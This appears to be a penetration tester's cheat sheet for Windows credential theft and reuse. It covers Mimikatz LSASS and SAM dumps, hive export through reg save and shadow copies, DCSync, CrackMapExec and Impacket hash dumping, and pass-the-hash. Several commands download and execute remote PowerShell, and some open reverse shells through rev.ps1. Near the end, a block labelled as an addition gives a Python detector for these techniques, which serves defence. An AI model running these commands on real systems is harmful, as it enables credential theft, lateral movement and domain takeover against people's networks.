Password hash dump and reuse
Local logon password dump
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.132:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords" "lsadump::sam" "exit"'
mimikatz.exe (needs a high-integrity process)
crackmapexec smb/mssql 1.1.1.1 -u Administrator -p 'Pwd' -M mimikatz -o COMMAND='privilege::debug'
(or -H nthash instead of -p)
token::elevate
# elevates the security token from high integrity (Administrator) to SYSTEM integrity (not needed if mimikatz is launched from a SYSTEM shell)
dump from LSASS memory
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
dump from SAM
lsadump::sam
.\mimikatz.exe "lsadump::secrets" "exit"
.\mimikatz64.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" "lsadump::secrets" "exit"
crack
john --wordlist=/usr/share/wordlists/rockyou.txt ntlmhash.txt --format=NT
CME dump hashes remotely (with local admin creds/hash)
#lsass
crackmapexec smb 172.16.1.100 -u admin -p 'pwd' -M lsassy --local-auth
(-d <domain> instead of --local-auth if the local admin is a domain user)
#sam
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --sam
(-H nthash)
Impacket: dump all user password hashes from SAM
victim
reg save HKLM\SAM .\SAM
reg save HKLM\SYSTEM .\SYSTEM
kali
impacket-secretsdump -system SYSTEM -sam SAM LOCAL
samdump2 SYSTEM SAM
with admin creds, can dump remotely from kali
impacket-secretsdump kudos.local/user:[email protected]
or user@ip -hashes :nthash
secretsdump.py domain.local/'dcadmin'@10.1.1.1 -hashes :nthash -dc-ip 10.1.1.1
crackmapexec smb 192.168.200.0/24 -u bwallis -d KUDOS.local -p P@ssWord! --sam
(or -H :nthash instead of -p)
alternative
powershell.exe -nop -exec bypass -c "IEX(New-Object Net.Webclient).DownloadString('http://172.16.1.30/Invoke-PowerDump.ps1'); Invoke-Powerdump"
wmic shadowcopy call create Volume='C:\'
vssadmin.exe list shadows
(check shadow copy volume path eg \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3)
mkdir C:\temp
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SYSTEM C:\temp\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM C:\temp\SAM
cd C:\temp && dir
cd C:\ & dir /S /B SAM == SYSTEM == SAM.OLD == SYSTEM.OLD == SAM.BAK == SYSTEM.BAK
icacls C:\Windows\System32\Config\SYSTEM.OLD
icacls C:\Windows\System32\Config\SAM.OLD
cp C:\Windows\System32\Config\SYSTEM.OLD C:\tmp
cp C:\Windows\System32\Config\SAM.OLD C:\tmp
cd C:\tmp && dir
Domain password dump
/user:<target>, e.g. the built-in domain admin account Administrator; or /all
.\mimikatz.exe "lsadump::dcsync /user:Administrator (/csv)" "exit"
Check where the credentials can be used
(Pwned = admin on the machine)
smb <-> winrm
crackmapexec smb 192.168.200.0/24 -u calcock -H 924572879ba3b163cc44e0abc5af208a --local-auth
crackmapexec smb 192.168.200.0/24 -u bwallis -d KUDOS.local -p P@ssWord!
crackmapexec smb 172.16.1.100 172.16.1.200 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth --continue-on-success
(check against the DC; Pwned = can be owned with psexec)
crackmapexec smb 172.16.1.5 -u nessex -H 0d53464368d5e2b607cd68ea29a8cc5f
crackmapexec winrm 172.16.1.5 -u nessex -H 0d53464368d5e2b607cd68ea29a8cc5f
CME PtH for a reverse shell
(-p password instead of -H) (-x runs a cmd command, -X runs PowerShell)
crackmapexec smb 172.16.1.200 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth -X "iex(new-object net.webclient).downloadstring('http://172.16.1.30/rev.ps1')"
NTLM PtH with local Administrator / AD user (not applicable to kerberos)
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 "powershell.exe -c iex(new-object net.webclient).downloadstring('http://172.16.1.30/rev.ps1')"
pth-winexe -U username%lmhash:nthash //{host} command
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8c802621d2e36fc074345dded890f3e5 domain.local/[email protected]
the LM half may be omitted, i.e. -hashes :nthash
NTLM -> TGT: overpass the hash - gain tickets as a specific user (e.g. another logged-on local admin)
# the TGT can only be used on the machine where it was created
after sekurlsa::logonpasswords
sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe
klist
(.\mimikatz.exe "sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:shell.exe" "exit")
NTLM -> TGT
# in the new shell
net use \\dc01 (or any command that requires domain permissions and will therefore request a TGS)
klist
TGT -> RCE
.\psexec.exe \\dc01 cmd.exe -accepteula (or -d -c C:\temp\shell.exe if placed in pivoter)
ipconfig && whoami
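As the defender's counterpart to the steps above, an added detection example (not part of the original notes) that flags the reg.exe hive export, the shadow-copy hive read, an LSASS memory read and a DCSync replication request in constructed Sysmon/Security event records; the flat field names, the LSASS reader allow-list and the sample events are assumptions.

```python
import re

# Sysmon EID 10: PROCESS_VM_READ (0x10) on lsass.exe is the access the
# sekurlsa::logonpasswords step needs; alert unless the reader is expected.
PROCESS_VM_READ = 0x10
# Constructed allow-list (assumption): images expected to read LSASS memory.
LSASS_READERS_ALLOWED = {"c:\\program files\\windows defender\\msmpeng.exe"}
# Control-access-right GUIDs a DCSync replication request exercises (Security 4662).
DS_REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# Sysmon EID 1 command-line patterns for the hive-export, shadow-copy and mimikatz steps.
CMDLINE_RULES = [
    ("sam_hive_export", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system)\b", re.I)),
    ("shadow_copy_hive_read", re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\config\\(sam|system)\b", re.I)),
    ("shadow_copy_tooling", re.compile(r"vssadmin(\.exe)?\s+list\s+shadows|wmic\s+shadowcopy\s+call\s+create", re.I)),
    ("mimikatz_module", re.compile(r"sekurlsa::|lsadump::|privilege::debug", re.I)),
]

def evaluate(event):
    """Return the rule names one flat event record trips (empty list if none)."""
    hits = []
    eid = event.get("EventID")
    if eid == 1:
        hits += [name for name, rx in CMDLINE_RULES if rx.search(event.get("CommandLine", ""))]
    elif eid == 10 and event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        granted = int(event.get("GrantedAccess", "0x0"), 16)
        if granted & PROCESS_VM_READ and event.get("SourceImage", "").lower() not in LSASS_READERS_ALLOWED:
            hits.append("lsass_memory_read")
    elif eid == 4662 and not event.get("SubjectUserName", "").endswith("$"):  # DC machine accounts replicate legitimately
        if any(g in event.get("Properties", "").lower() for g in DS_REPLICATION_GUIDS):
            hits.append("dcsync_replication_by_user")
    return hits

def scan(events):
    """Map RecordId -> rule hits for every event that trips at least one rule."""
    return {e["RecordId"]: hits for e in events if (hits := evaluate(e))}

# Constructed sample events in a flat dict shape (field names follow the event XML, not a SIEM schema).
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1, "CommandLine": r"reg save HKLM\SAM .\SAM"},
    {"RecordId": 2, "EventID": 1, "CommandLine": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM C:\temp\SAM"},
    {"RecordId": 3, "EventID": 10, "TargetImage": r"C:\Windows\system32\lsass.exe", "SourceImage": r"C:\temp\dump.exe", "GrantedAccess": "0x1010"},
    {"RecordId": 4, "EventID": 10, "TargetImage": r"C:\Windows\system32\lsass.exe", "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe", "GrantedAccess": "0x1010"},
    {"RecordId": 5, "EventID": 4662, "SubjectUserName": "Administrator", "Properties": "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"RecordId": 6, "EventID": 4662, "SubjectUserName": "DC01$", "Properties": "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"RecordId": 7, "EventID": 1, "CommandLine": "ipconfig /all"},
]
```

Running `scan(SAMPLE_EVENTS)` flags records 1, 2, 3 and 5 only; the Defender read of LSASS and the DC01$ replication are left alone by the allow-list and the machine-account check.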
No SMB Winrm